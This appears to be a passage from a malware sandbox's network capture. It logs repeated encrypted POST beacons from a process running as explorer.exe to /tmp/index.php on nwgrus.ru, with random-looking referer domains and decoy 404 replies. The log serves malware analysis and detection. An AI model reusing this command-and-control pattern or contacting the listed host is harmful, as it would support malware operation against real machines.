                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          17192.168.2.549925190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:49.348943949 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://pjcbyveqviwch.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 314
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:49.348961115 CEST314OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 4a 2c a1 a7
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuJ,}2~tz~7BH,NjSo\+:Q?Vi[XMp\8x,IQ nnv;S<<ka38wGY{-T;
                                                                                          Oct 3, 2024 23:27:50.755795002 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:50 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          18192.168.2.549933190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:50.764036894 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://uppdgnyegjvory.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 146
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:50.764061928 CEST146OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 79 0e e4 b9
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuyUer}{$Z<| wN5tO%,>FT[^VC%
                                                                                          Oct 3, 2024 23:27:52.931044102 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:51 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                          Oct 3, 2024 23:27:52.934246063 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:51 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                          Oct 3, 2024 23:27:52.935062885 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:51 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          19192.168.2.549943190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:52.954955101 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://ldpymxrfawi.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 263
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:52.954978943 CEST263OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 59 5e d7 aa
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuY^-OV\OZ^*ffyqG)RS.87u.>2rj#LU}ZcY?_UOp{~MYECvNX
                                                                                          Oct 3, 2024 23:27:54.627145052 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:54 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          20192.168.2.549955190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:54.635824919 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://ucebrpsptgm.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 184
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:54.635843992 CEST184OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 2f 57 fa eb
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu/WT0xbK1]H7;nd.x$k8~&<,JK=NIvV@p&FH|3Q
                                                                                          Oct 3, 2024 23:27:56.022731066 CEST137INHTTP/1.1 200 OK
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          21192.168.2.549962190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:56.031805992 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://wvyisbukobdqdei.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 330
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:56.031821012 CEST330OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 7b 3c ca e3
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu{<V$dIX(</VnyCqTw2zI+g.P?HE-Tvg'X!H\D,eBb,vHCk)7=kKS
                                                                                          Oct 3, 2024 23:27:57.406315088 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:57 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          22192.168.2.549973190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:57.428765059 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://kymcsuriadoaei.org/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 266
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:57.428776979 CEST266OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 31 42 d8 82
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vu1BEUz|~X(dykKGl8.^g&5L7IMx@ hW89`4O,sqRJD^"yt~Mf(JP-rTY
                                                                                          Oct 3, 2024 23:27:58.837547064 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:27:58 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          23192.168.2.549983190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:27:58.846816063 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://wypsmdkfdcadpn.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 254
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:27:58.846834898 CEST254OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 50 08 fe e2
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuPDdx&cXM`qLF6u7|DM{a,#yhjZHb?u'wT9W: OR+XkgUt$\7k
                                                                                          Oct 3, 2024 23:28:00.557234049 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:28:00 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          24192.168.2.549995190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:28:00.566323996 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://erjyaeignxsu.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 334
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:28:00.566323996 CEST334OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 79 25 ed ea
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA -[k,vuy%lGn".?'Ulnf2)9e-FMaD3{%AQ49|[`%vRx;z],r).
                                                                                          Oct 3, 2024 23:28:01.961266041 CEST189INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:28:01 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                                                                                          Data Ascii: #\6Y9l_m=rA


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          25192.168.2.550001190.224.203.37801028C:\Windows\explorer.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Oct 3, 2024 23:28:03.321330070 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://mcjitqwtqilsk.com/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 305
                                                                                          Host: nwgrus.ru
                                                                                          Oct 3, 2024 23:28:03.321346045 CEST305OUTData Raw: 3b 6e 52 11 84 b9 19 51 d9 a9 c0 71 00 73 7e bb 0e 79 c1 96 1a 02 94 63 0c 74 7a e1 44 b0 c0 62 9f 57 c0 2b 00 6c 56 1d ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 59 0c b4 87
                                                                                          Data Ascii: ;nRQqs~yctzDbW+lV?#1|J7 M@NA ,[k,vuY:TAzEsOw6;s/So%-W9,$cjK'Nfr9<@@<IFm>6?[SS!#jCl\KY;_`?|+s
                                                                                          Oct 3, 2024 23:28:04.717483997 CEST484INHTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.26.0
                                                                                          Date: Thu, 03 Oct 2024 21:28:04 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Connection: close
